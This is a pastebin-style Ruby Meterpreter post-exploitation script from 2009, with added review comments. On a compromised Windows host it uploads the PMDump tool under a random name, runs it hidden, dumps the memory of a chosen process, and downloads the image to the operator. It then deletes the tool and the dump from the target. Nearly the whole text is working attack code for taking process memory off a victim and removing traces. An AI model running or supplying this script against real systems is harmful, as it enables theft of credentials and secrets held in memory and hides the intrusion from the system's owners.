
redmeat_uk

Sep 26th, 2009
#!/usr/bin/env ruby

# Meterpreter script for dumping target memory for a particular process using Arne Vidstrom's PMDump tool - http://ntsecurity.nu/toolbox/pmdump/

# This is a modified version of memdump.rb a script written by Carlos Perez (Dark Operator) - http://www.darkoperator.com/blog/2009/3/10/meterpreter-memory-dump-script.html

# modified by: redmeat_uk@hotmail.com
# date: 26/09/2009

require 'readline'

# `client` is not defined in this file; presumably the Meterpreter script
# runtime provides it as the active session handle.
session = client

# Switches accepted by the script: the boolean says whether the switch takes a
# value, the string is the help text shown by `usage`.
@@exec_opts = Rex::Parser::Arguments.new(
  "-h" => [ false,  "Help menu."                        ],
  "-t" => [ true,  "Change the timeout default 5min. Specify timeout in seconds"]
)

# Resolve the remote %TEMP% environment variable; the uploaded tool and the
# memory image are both written under this directory.
tmp = session.fs.file.expand_path("%TEMP%")

# File name for the memory image: a number in 0..99999, zero-padded to five
# digits. `rand` is not a cryptographic source, so the name is guessable.
imgname = rand(100000).to_s.rjust(5, "0")

# Default response timeout in seconds (5 minutes); `-t` overrides it.
timeoutsec = 300

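#---------------------------------------------------------------------------------------------------------
# Dumping memory image
#
# Uploads pmdump.exe to the remote temp directory, prints the process list it
# reports, asks the operator for a PID, dumps that process to a remote image
# file, downloads the image to /tmp/pmdump-<imgname> and finally deletes both
# remote files.
#
# session    - Meterpreter session handle (uses fs.file, sys.process,
#              response_timeout=).
# tmp        - remote directory the tool and the image are written to.
# imgname    - file name of the remote image; also the suffix of the local copy.
# timeoutsec - value assigned to session.response_timeout.
#
# Every stage that fails is reported with print_status and ends the run; the
# remote files are still removed on the way out.
#
# NOTE(review): tmp is interpolated unquoted into cmd.exe command lines, so a
# %TEMP% path containing spaces would presumably break them - confirm.
# NOTE(review): ::Exception is rescued as in the original, which also swallows
# Interrupt; narrowing it may change timeout handling - confirm before changing.
def memdump(session,tmp,imgname,timeoutsec)
  pmexe      = File.join(Msf::Config.install_root, "data", "pmdump.exe")
  pmscramble = sprintf("%.5d",rand(100000))
  remote_exe = "#{tmp}\\#{pmscramble}.exe"
  remote_img = "#{tmp}\\#{imgname}"
  local_img  = "/tmp/pmdump-#{imgname}"
  uploaded   = false

  print_status("Uploading pmdump for dumping memory of a process....")
  begin
    session.fs.file.upload_file(remote_exe, pmexe)
    uploaded = true
    print_status("pmdump uploaded as #{remote_exe}")
  rescue ::Exception => e
    print_status("The following Error was encountered: #{e.class} #{e}")
    # Without the tool on the remote side none of the later steps can work.
    return
  end

  session.response_timeout=timeoutsec
  print_status("Process list...")
  line = nil
  begin
    r = session.sys.process.execute("cmd.exe /c #{remote_exe} -list", nil, {'Hidden' => 'true','Channelized' => true})
    while(d = r.channel.read)
      print_status("#{d}")
    end
    r.channel.close
    r.close

    line = Readline::readline('Please enter PID: ')
    # readline returns nil on EOF; HISTORY.push only accepts strings.
    Readline::HISTORY.push(line) if line
  rescue ::Exception => e
    print_status("The following Error was encountered: #{e.class} #{e}")
    return
  end

  # The PID is pasted into a cmd.exe command line that runs on the remote
  # host, so accept digits only: anything else (typo, empty input, shell
  # metacharacters) would be interpreted by cmd.exe there.
  pid = line.to_s.strip
  unless pid =~ /\A\d+\z/
    print_status("Invalid PID #{line.inspect}: expected a decimal process id")
    return
  end

  print_status("Dumping memory for process id #{pid}")
  begin
    n = session.sys.process.execute("cmd.exe /c #{remote_exe} #{pid} #{remote_img}", nil, {'Hidden' => 'true','Channelized' => true})
    # Drain the channel until it closes so the dump has finished before the
    # download starts; the output itself is not used.
    while(n.channel.read)
    end
    n.channel.close
    n.close

    print_status("Finished dumping process's memory")
  rescue ::Exception => e
    print_status("The following Error was encountered: #{e.class} #{e}")
    return
  end

  print_status("Downloading memory dump for process id #{pid} to #{local_img}")
  begin
    session.fs.file.download_file(local_img, remote_img)
    # The image is raw process memory and may hold credentials or keys, and
    # /tmp is shared with a guessable file name: restrict it to the owner.
    # The file exists with default permissions until this line runs.
    File.chmod(0600, local_img) if File.exist?(local_img)
  rescue ::Exception => e
    print_status("The following Error was encountered: #{e.class} #{e}")
  end
ensure
  # Runs on every exit path once the upload succeeded, so a failed step does
  # not leave the tool or a copy of process memory on the remote disk.
  if uploaded
    begin
      print_status("Deleting pmdump.exe from target...")
      session.sys.process.execute("cmd.exe /c del #{remote_exe}", nil, {'Hidden' => 'true'})
      print_status("pmdump.exe deleted")
      print_status("Deleting left over files...")
      session.sys.process.execute("cmd.exe /c del #{remote_img}", nil, {'Hidden' => 'true'})
      print_status("process memory dump image on target deleted")
    rescue ::Exception => e
      print_status("The following Error was encountered: #{e.class} #{e}")
    end
  end
end
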
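################## MAIN ##################
# Parsing of options
#
# -t <seconds> replaces the default timeout; -h prints the usage text and
# stops option parsing. The dump runs only when help was not requested and
# every option was valid.
show_help = false
bad_opts  = false
@@exec_opts.parse(args) { |opt, idx, val|
  case opt
  when "-t"
    # The parser hands the value over as given on the command line; convert
    # it so session.response_timeout receives a positive integer, not a
    # string, and reject anything that is not a plain number of seconds.
    if val.to_s =~ /\A[1-9]\d*\z/
      timeoutsec = val.to_i
    else
      print_status("Invalid timeout #{val.inspect}: expected a positive number of seconds")
      bad_opts = true
    end
  when "-h"
    show_help = true
    print(
      "Process Memory Dumper Meterpreter Script\n" +
      @@exec_opts.usage
    )
    break
  end
}

unless show_help || bad_opts
  print_status("Running Meterpreter Process Memory Dump Script.....")
  memdump(session,tmp,imgname,timeoutsec)
end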